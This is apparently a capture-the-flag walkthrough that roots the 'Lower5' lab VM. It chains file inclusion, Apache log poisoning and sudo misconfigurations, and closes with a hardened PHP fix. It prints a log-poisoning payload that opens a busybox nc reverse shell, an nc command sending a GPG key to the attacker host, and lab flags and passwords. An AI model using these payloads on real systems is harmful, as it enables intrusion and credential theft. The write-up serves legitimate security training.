# Lab setup
Download: Lower5
Download and import it, NAT mode, straight into the fight.
IP: 10.10.10.10
# Penetration process
# Initial information gathering
Scan the ports first.
```
┌──(root㉿kali)-[~]
└─# nmap -p- -sV 10.10.10.10 -T4
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-23 04:06 EDT
Nmap scan report for 10.10.10.10
Host is up (0.00027s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
MAC Address: 08:00:27:53:7B:EC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.73 seconds
```
22 and 80. Let's have a look at 80.

Web penetration, everyone's favourite.
The menu bar links point to http://10.10.10.10/page.php?inc=about.html, which smells like file inclusion. Let's test it.
```
┌──(root㉿kali)-[~]
└─# curl http://10.10.10.10/page.php?inc=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
low:x:1000:1000:low:/home/low:/bin/bash
```
It's there.
# Exploitation
First try reading shadow so the passwords can be cracked.
```
┌──(root㉿kali)-[~]
└─# curl http://10.10.10.10/page.php?inc=/etc/shadow
<b>Security Alert:</b> Intrusion Attempt Detected...
```
No luck, so let's include the log instead.
```
┌──(root㉿kali)-[~]
└─# curl http://10.10.10.10/page.php?inc=/var/log/apache2/access.log
10.10.10.9 - - [23/Oct/2025:10:07:18 +0200] "GET / HTTP/1.0" 200 11884 "-" "-"
10.10.10.9 - - [23/Oct/2025:10:07:18 +0200] "GET /nmaplowercheck1761206840 HTTP/1.1" 404 453 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
```
Include a PHP reverse shell through the log directly.
```
┌──(root㉿kali)-[~]
└─# curl -s -H "User-Agent: <?php system('busybox nc 10.10.10.9 4444 -e /bin/sh'); ?>" "http://10.10.10.10/"
┌──(root㉿kali)-[~]
└─# curl http://10.10.10.10/page.php?inc=/var/log/apache2/access.log
```
Got a shell.
# Privilege escalation
Upgrade the terminal first.
```
┌──(root㉿kali)-[~]
└─# nc -lnvp 50088
listening on [any] 50088 ...
connect to [10.10.10.9] from (UNKNOWN) [10.10.10.10] 55678
script /dev/null -c bash
Script iniciado, el fichero de anotación de salida es '/dev/null'.
www-data@lower5:~$ ^Z
zsh: suspended nc -lnvp 50088
┌──(root㉿kali)-[~]
└─# stty raw -echo;fg
[1] + continued nc -lnvp 50088
reset xterm
www-data@lower5:~$ export TERM=xterm-256color
```
sudo turns out to be misconfigured.
```
www-data@lower5:/var/www/html$ sudo -l
Matching Defaults entries for www-data on lower5:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty
User www-data may run the following commands on lower5:
    (low) NOPASSWD: /usr/bin/bash
```
Run bash as user low.
```
www-data@lower5:/var/www/html$ sudo -u low /usr/bin/bash
low@lower5:/var/www/html$ cd ~
low@lower5:~$ source .bashrc
low@lower5:~$ cat user.txt
30a7b18992fef054ca6d904769fac413
```
Got the low user.
There is a root.gpg file in the home directory; transfer it to Kali and run john against it.
```
┌──(root㉿kali)-[~]
└─# nc -lnvp 4433 > gpg
listening on [any] 4433 ...
connect to [10.10.10.9] from (UNKNOWN) [10.10.10.10] 58330
^C
```
```
low@lower5:~$ nc 10.10.10.9 4433 < root.gpg
```
```
┌──(root㉿kali)-[~]
└─# gpg2john gpg > hash
File gpg
┌──(root㉿kali)-[~]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65011712 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:03:04 0.02% (ETA: 2025-11-04 10:00) 0g/s 16.81p/s 16.81c/s 16.81C/s future..carpediem
Password1        (administrator)
1g 0:00:03:27 DONE (2025-10-23 05:04) 0.004817g/s 16.88p/s 16.88c/s 16.88C/s Password1..wateva
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
Got the password Password1, but su with it doesn't work.
Check sudo again; there is more to find.
```
low@lower5:~$ sudo -l
Matching Defaults entries for low on lower5:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty
User low may run the following commands on lower5:
    (root) NOPASSWD: /usr/bin/pass
```
Running pass through sudo kept failing: sudo pass show root/password
Wrote an RSA key into the box and connected over ssh to get a proper terminal; only then does it run.
```
low@lower5:~$ mkdir .ssh
low@lower5:~$ cd .ssh
<xTgnit6423E3rS/5LFTtj1bmIEKfdfm01kGRu2+ln root@kali' > authorized_keys
```
Run it and enter the gpg password Password1.
```
┌──(root㉿kali)-[~/.ssh]
└─# ssh low@10.10.10.10
The authenticity of host '10.10.10.10 (10.10.10.10)' can't be established.
ED25519 key fingerprint is SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i/dOR4+6rQZf20TIk/U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.10' (ED25519) to the list of known hosts.
low@lower5:~$ sudo pass show /root/password
r00tP@zzW0rD123
low@lower5:~$ su -
Contraseña:
root@lower5:~# cat root.txt
008cdc7563e1d5afbcac3a241eba4db8
```
Finally got root's password r00tP@zzW0rD123.
# Analysis
A hole left open on purpose.
```
root@lower5:/var/www/html# cat page.php
<?php
$file = $_GET["inc"];
if (isset($file) && ($file === "about.html" || $file === "services.html" || $file === "portfolio.html" || $file === "contact.html" || $file === "/etc/passwd" || $file === "/var/log/apache2/access.log")) {
    include($file);
} else {
    echo "<b>Security Alert:</b> Intrusion Attempt Detected...";
}
?>
```
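As an added example (not the lab's own page.php), here is a hardened version of the same include logic: the request parameter is a key into a fixed map, never a path, so /etc/passwd and the Apache access log are unreachable and nothing written into a log can ever be executed. It assumes the four HTML pages were moved to a pages/ subdirectory next to the script.

```php
<?php
// Added example, not the lab's code: key-to-file map instead of an
// exact-match allowlist that also whitelists /etc/passwd and the access log.
declare(strict_types=1);

const PAGES = [
    'about'     => 'about.html',
    'services'  => 'services.html',
    'portfolio' => 'portfolio.html',
    'contact'   => 'contact.html',
];

// Returns the absolute file for a page key, or null if the key is unknown
// or the resolved file somehow escapes the pages directory.
function resolve_page(string $key, string $base_dir): ?string
{
    if (!array_key_exists($key, PAGES)) {
        return null;                      // unknown key: no file is touched
    }
    $root = realpath($base_dir);
    $path = realpath($base_dir . DIRECTORY_SEPARATOR . PAGES[$key]);
    if ($root === false || $path === false
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;                      // defence in depth against misconfig
    }
    return $path;
}

$raw  = $_GET['inc'] ?? 'about';          // default page instead of an error
$key  = is_string($raw) ? $raw : '';      // inc[]=x must not become "Array"
$file = resolve_page($key, __DIR__ . '/pages');   // assumed layout: ./pages/

if ($file === null) {
    http_response_code(404);
    echo 'Page not found';                // no hint about valid names
    exit;
}

// readfile() serves static HTML as bytes; unlike include() it never runs
// PHP tags found in the file, which is what made the log include fatal.
readfile($file);
```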